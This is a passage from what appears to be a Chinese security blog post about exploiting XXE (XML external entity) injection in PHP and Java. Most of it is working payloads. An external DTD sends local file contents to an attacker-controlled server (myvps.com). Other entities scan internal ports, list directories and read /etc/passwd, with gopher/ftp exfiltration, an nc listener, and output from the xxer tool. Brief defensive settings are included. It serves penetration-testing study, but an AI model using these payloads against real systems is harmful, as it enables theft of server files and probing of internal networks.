</code></pre>
<p>myvps.com/file.dtd</p>
<pre><code class="xml">&lt;!ENTITY % all &quot;&lt;!ENTITY send SYSTEM &#39;http://myvps.com/?q=%file;&#39;&gt;&quot;&gt;  </code></pre>
<h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h4><pre><code class="xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;!DOCTYPE foo [
&lt;!ELEMENT foo ANY &gt;
&lt;!ENTITY data SYSTEM &quot;http://127.0.0.1:8080&quot;&gt;]&gt;
&lt;root&gt;&amp;data;&lt;/root&gt;</code></pre>
<h3 id="漏洞防御"><a href="#漏洞防御" class="headerlink" title="漏洞防御"></a>漏洞防御</h3><pre><code class="xml">libxml_disable_entity_loader(true);
或者
libxml2.9.0以后默认不开启外部实体引用，gameover</code></pre>
<h3 id="Java-xxe-漏洞利用"><a href="#Java-xxe-漏洞利用" class="headerlink" title="Java xxe 漏洞利用"></a>Java xxe 漏洞利用</h3><h4 id="列目录"><a href="#列目录" class="headerlink" title="列目录"></a>列目录</h4><p>Java xxe 可以列目录</p>
<p>发送的payload</p>
<pre><code class="xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;!DOCTYPE root [&lt;!ENTITY % remote SYSTEM &quot;http://myvps.com/dir.dtd&quot;&gt;%remote;]&gt;</code></pre>
<p>myvps.com/dir.dtd</p>
<p>file:///etc/passwd</p>
<p>file:///c:///windows/win.ini</p>
<pre><code class="xml">&lt;!ENTITY % a SYSTEM &quot;file:///&quot;&gt; &lt;!ENTITY % b &quot;&lt;!ENTITY &amp;#37; c SYSTEM &#39;gopher://myvps.com:9000/%a;&#39;&gt;&quot;&gt; %b; %c;</code></pre>
<p>myvps.com上运行nc监听</p>
<pre><code class="shell">nc -klvvp 9000</code></pre>
<p>除了gopher协议，还常用ftp协议、http协议</p>
<h3 id="漏洞防御-1"><a href="#漏洞防御-1" class="headerlink" title="漏洞防御"></a>漏洞防御</h3><pre><code>DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);</code></pre><h3 id="简化利用方式"><a href="#简化利用方式" class="headerlink" title="简化利用方式"></a>简化利用方式</h3><p><a href="https://github.com/TheTwitchy/xxer" target="_blank" rel="noopener">xxer</a></p>
<pre><code>usage: xxer [-h] [-v] [-q] [-p HTTP] [-P FTP] -H HOSTNAME [-d DTD]

XXE Injection Handler

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program&#39;s version number and exit
  -q, --quiet           surpress extra output
  -p HTTP, --http HTTP  HTTP server port
  -P FTP, --ftp FTP     FTP server port
  -H HOSTNAME, --hostname HOSTNAME
                        Hostname of this server
  -d DTD, --dtd DTD     the location of the DTD template. client_file
                        templates allow the filename to be specified by the
                        XXE payload instead of restarting the server

Originally from https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-
server.rb, rewritten in Python by TheTwitchy</code></pre><pre><code>python xxer.py -P 2121 -d ftp.client_file.dtd.template -H yourvps.com

 _ _ _ _ ___ ___
|_&#39;_|_&#39;_| -_|  _|
|_,_|_,_|___|_|

version 1.1

info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8080
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;!DOCTYPE xmlrootname [&lt;!ENTITY % aaa SYSTEM &quot;http://yourvps.com:8080/ext.dtd&quot;&gt;&lt;!ENTITY % bbb SYSTEM &quot;file:///&quot;&gt;%aaa;%ccc;%ddd;]&gt;
</code></pre>
      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至3213359017@qq.com </span>
    </div>
</article>







    




    </div>
    <div class="copyright">
        <p class="footer-entry"><span class="miit">
                <img src="/img/gov.png" title="中华人民共和国工业和信息化部">
                <a href="http://beian.miit.gov.cn/" target="_blank" rel="noopener">粤ICP备19027389号</a>
        </span>
    
    ©2015-2020 UltramanGaia
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    
    #post .pjax article .article-entry>ol, #post .pjax article .article-entry>ul, #post .pjax article>ol, #post .pjax article>ul{
        border: #e2dede solid 1px;
        border-radius: 10px;
        padding: 10px 32px 10px 56px;
    }
    #post .pjax article .article-entry li>ol, #post .pjax article .article-entry li>ul,#post .pjax article li>ol, #post .pjax article li>ul{
        padding-top: 5px;
        padding-bottom: 5px;
    }
    #post .pjax article .article-entry>ol>li, #post .pjax article .article-entry>ul>li,#post .pjax article>ol>li, #post .pjax article>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    #post .pjax article .article-entry li>ol>li, #post .pjax article .article-entry li>ul>li,#post .pjax article li>ol>li, #post .pjax article li>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
